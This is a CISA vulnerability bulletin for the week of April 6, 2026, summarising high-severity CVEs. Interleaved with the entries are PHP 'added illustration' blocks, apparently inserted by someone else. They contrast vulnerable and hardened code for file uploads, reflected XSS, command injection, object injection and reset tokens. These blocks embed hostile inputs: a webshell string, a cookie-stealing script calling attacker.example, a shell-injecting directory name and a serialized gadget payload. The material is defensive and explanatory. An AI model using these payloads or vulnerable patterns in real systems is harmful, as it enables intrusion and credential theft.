• Vulnerability Summary for the Week of April 6, 2026

    From CISA@cisa@messages.cisa.gov to cisa@toolazy.synchro.net on Tue Apr 14 11:54:14 2026

    Cybersecurity and Infrastructure Security Agency (CISA)

    You are subscribed to Vulnerability Bulletins for Cybersecurity and Infrastructure Security Agency. This information has recently been updated and is now available.

    The CISA Vulnerability Bulletin provides a summary of new vulnerabilities that have been recorded in the past week. In some cases, the vulnerabilities in the bulletin may not yet have assigned CVSS scores.

    Vulnerabilities are based on the Common Vulnerabilities and Exposures [ https://www.cve.org/ ] (CVE) vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System [ https://www.cve.org/about/relatedefforts ] (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:


    * *High*: vulnerabilities with a CVSS base score of 7.0–10.0
    * *Medium*: vulnerabilities with a CVSS base score of 4.0–6.9
    * *Low*: vulnerabilities with a CVSS base score of 0.0–3.9

    Entries may include additional information provided by organizations and efforts sponsored by CISA. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletin is compiled from external, open-source reports and is not a direct result of CISA analysis.

    Vulnerability Summary for the Week of April 6, 2026 [ https://www.cisa.gov/news-events/bulletins/sb26-103 ] 04/14/2026 08:00 AM EDT
    High Vulnerabilities

    Columns: Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info

    nyariv--SandboxJS
      Description: SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36.
      Published: 2026-04-06
      CVSS Score: 10
      Source Info: CVE-2026-34208 [ https://www.cve.org/CVERecord?id=CVE-2026-34208 ]
      Patch Info: https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj

    Davidtavarez--CF Image Hosting Script
      Description: CF Image Hosting Script 1.6.5 allows unauthenticated attackers to download and decode the application database by accessing the imgdb.db file in the upload/data directory. Attackers can extract delete IDs stored in plaintext from the deserialized database and use them to delete all pictures via the d parameter.
      Published: 2026-04-12
      CVSS Score: 9.8
      Source Info: CVE-2019-25709 [ https://www.cve.org/CVERecord?id=CVE-2019-25709 ]
      Patch Info:
        ExploitDB-46094 [ https://www.exploit-db.com/exploits/46094 ]
        Official Product Homepage [ https://davidtavarez.github.io/ ]
        Product Reference [ http://forum.codefuture.co.uk/showthread.php?tid=73141 ]
        VulnCheck Advisory: CF Image Hosting Script 1.6.5 Unauthorized Database Access [ https://www.vulncheck.com/advisories/cf-image-hosting-script-unauthorized-database-access ]

    Beijing Topsec Network Security Technology Co., Ltd.--Tianxin Internet Behavior Management System
      Description: Tianxin Internet Behavior Management System contains a command injection vulnerability in the Reporter component endpoint that allows unauthenticated attackers to execute arbitrary commands by supplying a crafted objClass parameter containing shell metacharacters and output redirection. Attackers can exploit this vulnerability to write malicious PHP files into the web root and achieve remote code execution with the privileges of the web server process. This vulnerability has been fixed in version NACFirmware_4.0.0.7_20210716.180815_topsec_0_basic.bin. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-06-01 (UTC).
      Published: 2026-04-07
      CVSS Score: 9.8
      Source Info: CVE-2021-4473 [ https://www.cve.org/CVERecord?id=CVE-2021-4473 ]
      Patch Info:
        https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972
        https://www.cnvd.org.cn/patchInfo/show/280166
        https://cn-sec.com/archives/4631959.html
        https://avd.aliyun.com/detail?id=AVD-2021-890232
        https://www.vulncheck.com/advisories/tianxin-internet-behavior-management-system-command-injection-via-toquery-php

    Contemporary Controls--BASControl20
      Description: An attacker could use data obtained by sniffing the network traffic to forge packets in order to make arbitrary requests to Contemporary Controls BASC 20T.
      Published: 2026-04-09
      CVSS Score: 9.8
      Source Info: CVE-2025-13926 [ https://www.cve.org/CVERecord?id=CVE-2025-13926 ]
      Patch Info:
        https://www.ccontrols.com/support/contacttech.htm
        https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01
        https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json

    SaturdayDrive--Ninja Forms - File Uploads
      Description: The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.
      Published: 2026-04-07
      CVSS Score: 9.8
      Source Info: CVE-2026-0740 [ https://www.cve.org/CVERecord?id=CVE-2026-0740 ]
      Patch Info:
        https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=cve
        https://ninjaforms.com/extensions/file-uploads/
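The "missing file type validation" in the Ninja Forms entry above (the same defect recurs in the ProSolution WP Client entry further down) is a pattern rather than a one-off, so here is an added PHP illustration of it. This is not Ninja Forms, ProSolution or WordPress code: the unsafe validator trusts the client-supplied file name and Content-Type, the hardened one takes the extension from an allowlist and the MIME type from the bytes, and storage uses a server-chosen name. All file names, contents and the upload directory are constructed for the demo.

```php
<?php
// Added illustration (not Ninja Forms or ProSolution code). Shows the
// "missing file type validation" pattern and a hardened validator.
// Names, directories and file contents are constructed for the demo.

const ALLOWED_TYPES = [
    // extension => MIME type the bytes themselves must have
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'pdf'  => 'application/pdf',
];

// Unsafe: trusts the client-supplied name and Content-Type. A multipart
// part with filename="shell.php" and type="image/png" is accepted, and the
// attacker chooses where under the web root it lands.
function validateUploadUnsafe(array $file): string
{
    if (strpos($file['type'], 'image/') !== 0) {
        throw new RuntimeException('not an image');
    }
    return $file['name'];
}

// Hardened: extension from an allowlist, MIME type from the bytes (finfo),
// nothing from the request headers. Returns the extension to store under.
function validateUploadSafe(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] <= 0) {
        throw new RuntimeException('bad upload');
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException("extension .$ext not allowed");
    }
    $real = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($real !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content is $real, expected " . ALLOWED_TYPES[$ext]);
    }
    return $ext;
}

// Store under a random name we choose, in a directory outside the document
// root (assumed here), non-executable. Only meaningful inside a real request.
function storeUpload(array $file, string $uploadDir): string
{
    $ext  = validateUploadSafe($file);
    $dest = rtrim($uploadDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('move failed');
    }
    chmod($dest, 0640);
    return $dest;
}

// Constructed requests: what $_FILES['file'] would hold.
function fakeUpload(string $name, string $type, string $bytes): array
{
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    return ['name' => $name, 'type' => $type, 'tmp_name' => $tmp,
            'error' => UPLOAD_ERR_OK, 'size' => strlen($bytes)];
}

$webshell = "<?php system(\$_GET['c']); ?>";
$png      = "\x89PNG\r\n\x1a\n";   // PNG signature only; enough for libmagic

$cases = [
    'php name, image type'  => fakeUpload('../shell.php', 'image/png', $webshell),
    'png name, php content' => fakeUpload('shell.png',    'image/png', $webshell),
    'real png'              => fakeUpload('photo.png',    'image/png', $png),
];

foreach ($cases as $label => $file) {
    try {
        echo "$label: unsafe accepts as '" . validateUploadUnsafe($file) . "'";
    } catch (RuntimeException $e) {
        echo "$label: unsafe rejects (" . $e->getMessage() . ')';
    }
    try {
        echo ', safe accepts as .' . validateUploadSafe($file) . "\n";
    } catch (RuntimeException $e) {
        echo ', safe rejects (' . $e->getMessage() . ")\n";
    }
    unlink($file['tmp_name']);
}
```

The second case is the one extension-only checks miss: a `.png` name with PHP inside passes an allowlist on the name and is only caught by inspecting the bytes. Serving uploads from outside the document root, through a handler that sets the Content-Type itself, removes the remaining risk that a misidentified file is ever executed by the web server.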
    IBM--Verify Identity Access Container
      Description: IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to escalate their privileges to root due to execution with more privileges than required.
      Published: 2026-04-08
      CVSS Score: 9.3
      Source Info: CVE-2026-1346 [ https://www.cve.org/CVERecord?id=CVE-2026-1346 ]
      Patch Info: https://www.ibm.com/support/pages/node/7268253

    davidfcarr--Quick Playground
      Description: The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server.
      Published: 2026-04-09
      CVSS Score: 9.8
      Source Info: CVE-2026-1830 [ https://www.cve.org/CVERecord?id=CVE-2026-1830 ]
      Patch Info:
        https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve
        https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39
        https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419
        https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail=

    LibRaw--LibRaw
      Description: A heap-based buffer overflow vulnerability exists in the x3f_thumb_loader functionality of LibRaw Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.
      Published: 2026-04-07
      CVSS Score: 9.8
      Source Info: CVE-2026-20889 [ https://www.cve.org/CVERecord?id=CVE-2026-20889 ]
      Patch Info: https://talosintelligence.com/vulnerability_reports/TALOS-2026-2358

    LibRaw--LibRaw
      Description: A heap-based buffer overflow vulnerability exists in the HuffTable::initval functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.
      Published: 2026-04-07
      CVSS Score: 9.8
      Source Info: CVE-2026-20911 [ https://www.cve.org/CVERecord?id=CVE-2026-20911 ]
      Patch Info: https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330

    LibRaw--LibRaw
      Description: A heap-based buffer overflow vulnerability exists in the lossless_jpeg_load_raw functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.
      Published: 2026-04-07
      CVSS Score: 9.8
      Source Info: CVE-2026-21413 [ https://www.cve.org/CVERecord?id=CVE-2026-21413 ]
      Patch Info: https://talosintelligence.com/vulnerability_reports/TALOS-2026-2331

    Weaver Network Co., Ltd.--E-cology
      Description: Weaver (Fanwei) E-cology 10.0 versions prior to 20260312 contain an unauthenticated remote code execution vulnerability in the /papi/esearch/data/devops/dubboApi/debug/method endpoint that allows attackers to execute arbitrary commands by invoking exposed debug functionality. Attackers can craft POST requests with attacker-controlled interfaceName and methodName parameters to reach command-execution helpers and achieve arbitrary command execution on the system. Exploitation evidence was first observed by the Shadowserver Foundation on 2026-03-31 (UTC).
      Published: 2026-04-07
      CVSS Score: 9.8
      Source Info: CVE-2026-22679 [ https://www.cve.org/CVERecord?id=CVE-2026-22679 ]
      Patch Info:
        https://www.weaver.com.cn/cs/securityDownload.html#
        https://h4cker.zip/post/d5d211/
        https://ti.qianxin.com/vulnerability/notice-detail/1760
        https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboapi-debug-endpoint

    prosolution--ProSolution WP Client
      Description: The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
      Published: 2026-04-08
      CVSS Score: 9.8
      Source Info: CVE-2026-2942 [ https://www.cve.org/CVERecord?id=CVE-2026-2942 ]
      Patch Info:
        https://www.wordfence.com/threat-intel/vulnerabilities/id/3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=cve
        https://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/public/class-prosolwpclient-public.php?rev=3331282#L993
        https://plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client

    Rukovoditel--Rukovoditel CRM
      Description: A reflected cross-site scripting (XSS) vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/api/tel/zadarma.php). The application directly reflects user-supplied input from the 'zd_echo' GET parameter into the HTTP response without proper sanitization, output encoding, or content-type restrictions. The vulnerable code is: if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']); An unauthenticated attacker can exploit this issue by crafting a malicious URL containing JavaScript payloads. When a victim visits the link, the payload executes in the context of the application within the victim's browser, potentially leading to session hijacking, credential theft, phishing, or account takeover. The issue is fixed in version 3.7, which introduces proper input validation and output encoding to prevent script injection.
      Published: 2026-04-11
      CVSS Score: 9.3
      Source Info: CVE-2026-31845 [ https://www.cve.org/CVERecord?id=CVE-2026-31845 ]
      Patch Info: https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499
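The Rukovoditel entry above quotes the vulnerable line, so an added PHP illustration of the hardened shape follows. It is not Rukovoditel's 3.7 fix. The point it makes is that an echo-back endpoint for telephony webhook verification only ever needs to return an opaque token, so the right fix is to allowlist the token's character set and answer as text/plain, rather than HTML-encode and keep serving the value as an HTML document. Function names, the character-set rule and the sample requests are assumptions.

```php
<?php
// Added illustration (not Rukovoditel's code). The vulnerable endpoint
// reflects $_GET['zd_echo'] verbatim with the default text/html type.
// Inputs below are constructed.

// Vulnerable shape: whatever arrives becomes the response body.
function zadarmaEchoUnsafe(array $get): string
{
    return isset($get['zd_echo']) ? $get['zd_echo'] : '';
}

// Hardened: only a plausible verification token is echoed. Returns the
// value to send, or null when the request must be refused.
function zadarmaEchoSafe(array $get): ?string
{
    if (!isset($get['zd_echo']) || !is_string($get['zd_echo'])) {
        return null;
    }
    $v = $get['zd_echo'];
    // Allowlist rather than a denylist of '<' and '>': an opaque token has
    // no business containing anything outside this set (rule assumed here).
    return preg_match('/\A[A-Za-z0-9_-]{1,128}\z/', $v) === 1 ? $v : null;
}

// Response headers are part of the fix: even a validated token must not be
// interpreted as a document, and nosniff stops MIME guessing.
function sendEcho(?string $value): void
{
    header('Content-Type: text/plain; charset=utf-8');
    header('X-Content-Type-Options: nosniff');
    header("Content-Security-Policy: default-src 'none'");
    if ($value === null) {
        http_response_code(400);
        echo 'invalid zd_echo';
        return;
    }
    echo $value;
}

// Constructed requests.
$attack = ['zd_echo' => '<script>location="https://attacker.example/?c="+document.cookie</script>'];
$legit  = ['zd_echo' => 'a1b2c3d4e5f6'];

$unsafeBody = zadarmaEchoUnsafe($attack);
$safeAttack = zadarmaEchoSafe($attack);
$safeLegit  = zadarmaEchoSafe($legit);

if (PHP_SAPI === 'cli') {
    // Show the decisions without touching real HTTP headers.
    printf("unsafe reflects markup: %s\n", strpos($unsafeBody, '<script>') !== false ? 'yes' : 'no');
    printf("safe accepts attack:    %s\n", $safeAttack === null ? 'no' : 'yes');
    printf("safe accepts token:     %s\n", $safeLegit === $legit['zd_echo'] ? 'yes' : 'no');
} else {
    sendEcho(zadarmaEchoSafe($_GET));
}
```

Run it from the command line to see the three decisions; behind a web server it answers the request itself. If a legitimate verification string can contain characters outside the allowlist, widen the pattern rather than drop it; the text/plain type and nosniff header remain the backstop.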
    chamilo--chamilo-lms
      Description: Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter - which only passes through Security::remove_XSS() (an HTML-only filter) - is concatenated directly into shell commands such as exec("mv $source $target"). By default, Chamilo allows all authenticated users to create courses (allow_users_to_create_courses = true). Any user who is a teacher in a course (including self-created courses) can move documents, making this vulnerability exploitable by any authenticated user. The attacker must first place a directory with shell metacharacters in its name on the filesystem (achievable via Course Backup Import), then move a document into that directory to trigger arbitrary command execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
      Published: 2026-04-10
      CVSS Score: 9.1
      Source Info: CVE-2026-32892 [ https://www.cve.org/CVERecord?id=CVE-2026-32892 ]
      Patch Info:
        https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr
        https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf
        https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1
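The Chamilo entry above explains the mechanism precisely: an HTML-only filter leaves shell metacharacters alone, and a directory name is then interpolated into exec("mv $source $target"). The following added PHP illustration is not Chamilo's code or its fix. It reduces the pattern to three helpers: the raw-interpolation shape, the same command built with escapeshellarg(), and a version that avoids the shell altogether and pins the destination under the course directory. Paths, the directory name and the filter stand-in are constructed.

```php
<?php
// Added illustration (not Chamilo's code). Shows why an HTML-only filter
// does not protect a value that ends up inside exec("mv $source $target"),
// and two ways to close the hole. Paths and names are constructed.

// What the attacker needs: a directory whose *name* carries shell syntax.
// To the filesystem it is an ordinary name; only a shell parses it.
$courseRoot = '/var/www/courses/DEMO/document';
$source     = $courseRoot . '/notes.txt';
$evilDir    = $courseRoot . '/x; id > /tmp/pwned #';

// Stand-in for an HTML-oriented filter (Security::remove_XSS in the
// advisory): tags go, shell metacharacters stay.
function htmlOnlyFilter(string $s): string
{
    return strip_tags($s);
}

// 1. Vulnerable shape: raw interpolation into a shell command line.
function buildMoveCommandUnsafe(string $source, string $target): string
{
    return "mv $source $target";
}

// 2. Hardened: every interpolated value becomes exactly one shell word.
function buildMoveCommandSafe(string $source, string $target): string
{
    return 'mv ' . escapeshellarg($source) . ' ' . escapeshellarg($target);
}

// 3. Preferable: no shell at all, plus a containment check so the
//    destination cannot leave the course directory.
function moveDocument(string $source, string $targetDir, string $courseRoot): bool
{
    $root = realpath($courseRoot);
    $dir  = realpath($targetDir);
    if ($root === false || $dir === false) {
        return false;
    }
    if ($dir !== $root && strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return false;  // traversal outside the course root
    }
    return rename($source, $dir . DIRECTORY_SEPARATOR . basename($source));
}

$filtered = htmlOnlyFilter($evilDir);   // nothing for strip_tags to remove
$unsafe   = buildMoveCommandUnsafe($source, $filtered);
$safe     = buildMoveCommandSafe($source, $filtered);

echo "filter changed the value: ", $filtered === $evilDir ? 'no' : 'yes', "\n";
echo "unsafe: $unsafe\n";
// The shell splits the unsafe line at ';': 'mv ... x' runs, then
// 'id > /tmp/pwned', and '#' comments out the rest of the name.
echo "safe:   $safe\n";
// Here the whole directory name is a single quoted argument to mv.

// The quoting really does keep the name as one argument through a shell:
$roundTrip = shell_exec('printf %s ' . escapeshellarg($evilDir));
echo "escapeshellarg round-trips: ", $roundTrip === $evilDir ? 'yes' : 'no', "\n";
```

The round-trip at the end runs `printf` with the quoted name and compares what comes back; nothing else is executed. In an application the third helper is the one to reach for: rename() never consults a shell, and the realpath() containment check also closes the traversal that a raw move_to parameter would otherwise allow.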
    wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey & Custom Form Builder
      Description: The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions.
      Published: 2026-04-08
      CVSS Score: 9.8
      Source Info: CVE-2026-3296 [ https://www.cve.org/CVERecord?id=CVE-2026-3296 ]
      Patch Info:
        https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-790d-4b18-a9ec-054c8c27b8bc?source=cve
        https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admin/views/html-admin-page-entries-view.php#L133
        https://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/views/html-admin-page-entries-view.php#L133
        https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-functions.php#L5594
        https://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4.4/readme.txt?old=3464753&old_path=everest-forms%2Ftags%2F3.4.3%2Freadme.txt
        https://plugins.trac.wordpress.org/changeset?old_path=/everest-forms/tags/3.4.3&new_path=/everest-forms/tags/3.4.4
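The Everest Forms entry above describes a full chain: the payload passes sanitize_text_field() intact, sits in the database, and is handed to unserialize() without allowed_classes when an administrator views it. The added PHP illustration below is not Everest Forms or WordPress code. It uses a constructed gadget class, an approximation of sanitize_text_field(), and a constructed serialized payload to show each link, then the two fixes: ['allowed_classes' => false] and a format without object semantics.

```php
<?php
// Added illustration (not Everest Forms code). Shows that a serialized
// object string passes a sanitize_text_field()-style text filter intact,
// that unserialize() without allowed_classes instantiates it (so a magic
// method on any loaded class becomes reachable), and that
// ['allowed_classes' => false] or a JSON format removes the object path.
// The gadget class and payload are constructed.

// Stand-in gadget: any class with a __wakeup/__destruct side effect that is
// loadable when the admin page runs. Here it only records that it fired.
class LogWriter
{
    public string $path = '/tmp/harmless.log';
    public string $data = '';
    public static array $fired = [];
    public function __destruct()
    {
        // A real gadget might do file_put_contents($this->path, $this->data).
        self::$fired[] = $this->path;
    }
}

// Approximation of WordPress sanitize_text_field(): tags, control
// characters and surrounding whitespace removed. Nothing a serialized
// string needs ('O', ':', '{', '"', ';', digits) is on that list.
function sanitizeTextFieldLike(string $s): string
{
    $s = strip_tags($s);
    $s = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', '', $s);
    return trim($s);
}

// The value an attacker submits in a public form field.
$payload = 'O:9:"LogWriter":2:{s:4:"path";s:14:"/var/www/x.php";s:4:"data";s:3:"abc";}';

// 1. Storage: what reaches the entry-meta table.
$stored = sanitizeTextFieldLike($payload);
echo "sanitizer altered payload: ", $stored === $payload ? 'no' : 'yes', "\n";

// 2. Vulnerable read: no second argument, every declared class is fair game.
$obj = unserialize($stored);
echo "unsafe unserialize produced: ", get_class($obj), " with path ", $obj->path, "\n";
unset($obj);                                   // __destruct runs here
echo "gadget fired: ", count(LogWriter::$fired), " time(s)\n";

// 3. Hardened read: allowed_classes => false yields __PHP_Incomplete_Class,
//    which has no magic methods of its own, so nothing runs.
$safe = unserialize($stored, ['allowed_classes' => false]);
echo "safe unserialize produced: ", get_class($safe), "\n";
unset($safe);
echo "gadget fired: ", count(LogWriter::$fired), " time(s)\n";

// 4. Preferable for new code: a format with no object semantics at all.
$json = json_encode(['path' => '/tmp/harmless.log', 'data' => 'abc']);
$back = json_decode($json, true);
echo "json_decode returns: ", gettype($back), "\n";
```

The counter printed after step 3 does not increase: with allowed_classes set, the stored string still round-trips as data, but no constructor, __wakeup or __destruct ever runs. The same argument also accepts an explicit list of class names when legitimate objects must be restored.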
    chamilo--chamilo-lms
      Description: Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
      Published: 2026-04-10
      CVSS Score: 9.4
      Source Info: CVE-2026-33707 [ https://www.cve.org/CVERecord?id=CVE-2026-33707 ]
      Patch Info:
        https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2
        https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8
        https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c
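The second Chamilo entry lists three missing properties of a reset token: randomness, expiry and rate limiting. The added PHP illustration below is not Chamilo's code or its fix; it puts the sha1($email) scheme beside one that generates the token from the CSPRNG, stores only a hash of it, bounds its lifetime and its failed attempts, makes it single-use, and compares it in constant time. The in-memory $store, the TTL and the attempt limit are assumptions standing in for a database table and a policy.

```php
<?php
// Added illustration (not Chamilo's code). Contrasts a password-reset token
// that is a pure function of the e-mail address with one that is random,
// stored hashed, time-limited, single-use, rate-limited and compared in
// constant time. $store stands in for a database table.

// The weak scheme from the entry above: no secret, so anyone who knows
// the address can produce the token.
function weakResetToken(string $email): string
{
    return sha1($email);
}

const RESET_TTL       = 900;  // seconds a token stays valid (assumed policy)
const RESET_MAX_TRIES = 5;    // failed attempts before the token is burned

function issueResetToken(array &$store, string $email, int $now): string
{
    $token = bin2hex(random_bytes(32));       // 256 bits from the CSPRNG
    $store[$email] = [
        'hash'    => hash('sha256', $token),  // only a hash at rest
        'expires' => $now + RESET_TTL,
        'tries'   => 0,
        'used'    => false,
    ];
    return $token;                            // leaves the server only by e-mail
}

function consumeResetToken(array &$store, string $email, string $token, int $now): bool
{
    if (!isset($store[$email])) {
        return false;
    }
    $rec = &$store[$email];
    if ($rec['used'] || $now > $rec['expires'] || $rec['tries'] >= RESET_MAX_TRIES) {
        return false;
    }
    $rec['tries']++;
    if (!hash_equals($rec['hash'], hash('sha256', $token))) {
        return false;                         // constant-time mismatch
    }
    $rec['used'] = true;                      // single use
    return true;
}

// Constructed walk-through.
$victim = 'victim@example.org';
$t0     = 1700000000;

// Weak scheme: the attacker's "token" is simply the hash of the address.
$forged = weakResetToken($victim);
echo "weak token derivable offline: ", $forged === sha1($victim) ? 'yes' : 'no', "\n";

// Stronger scheme.
$store  = [];
$real   = issueResetToken($store, $victim, $t0);
$checks = [
    'guessed sha1(email) rejected' => !consumeResetToken($store, $victim, sha1($victim), $t0),
    'real token accepted once'     =>  consumeResetToken($store, $victim, $real, $t0 + 60),
    'replay rejected'              => !consumeResetToken($store, $victim, $real, $t0 + 61),
];

$late = issueResetToken($store, $victim, $t0);
$checks['expired token rejected'] = !consumeResetToken($store, $victim, $late, $t0 + RESET_TTL + 1);

$fresh = issueResetToken($store, $victim, $t0);
for ($i = 0; $i < RESET_MAX_TRIES; $i++) {
    consumeResetToken($store, $victim, 'wrong-guess', $t0);
}
$checks['burned after too many tries'] = !consumeResetToken($store, $victim, $fresh, $t0);

foreach ($checks as $label => $ok) {
    echo $label, ': ', $ok ? 'ok' : 'FAIL', "\n";
}
```

Storing only hash('sha256', $token) means a database read does not yield usable tokens, and hash_equals() keeps the comparison from leaking how many leading bytes matched. The attempt counter is per token; a production deployment would also rate-limit the request endpoint per address and per client.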
    Juniper Networks--JSI LWC
      Description: A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible. This issue affects all versions of vLWC before 3.0.94.
      Published: 2026-04-09
      CVSS Score: 9.8
      Source Info: CVE-2026-33784 [ https://www.cve.org/CVERecord?id=CVE-2026-33784 ]
      Patch Info: https://kb.juniper.net/JSA107871

    Canonical--lxd
      Description: Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root.
      Published: 2026-04-09
      CVSS Score: 9.1
      Source Info: CVE-2026-34177 [ https://www.cve.org/CVERecord?id=CVE-2026-34177 ]
      Patch Info:
        VM lowlevel restriction bypass via raw.apparmor and raw.qemu.conf [ https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f ]
        lxd: Prevent use of raw.apparmor and raw.qemu.conf when low level options are blocked [ https://github.com/canonical/lxd/pull/17909 ]

    Canonical--lxd
      Description: In Canonical LXD before 6.8, the backup import path validates project restrictions against backup/index.yaml in the supplied tar archive but creates the instance from backup/container/backup.yaml, a separate file in the same archive that is never checked against project restrictions. An authenticated remote attacker with instance-creation permission in a restricted project can craft a backup archive where backup.yaml carries restricted settings such as security.privileged=true or raw.lxc directives, bypassing all project restriction enforcement and allowing full host compromise.
      Published: 2026-04-09
      CVSS Score: 9.1
      Source Info: CVE-2026-34178 [ https://www.cve.org/CVERecord?id=CVE-2026-34178 ]
      Patch Info:
        Importing a crafted backup leads to project restriction bypass [ https://github.com/canonical/lxd/security/advisories/GHSA-q96j-3fmm-7fv4 ]
        Import: Create backup config from index [ https://github.com/canonical/lxd/pull/17921 ]

    Canonical--lxd
      Description: In Canonical LXD versions 4.12 through 6.7, the doCertificateUpdate function in lxd/certificates.go does not validate the Type field when handling PUT/PATCH requests to /1.0/certificates/{fingerprint} for restricted TLS certificate users, allowing a remote authenticated attacker to escalate privileges to cluster admin.
      Published: 2026-04-09
      CVSS Score: 9.1
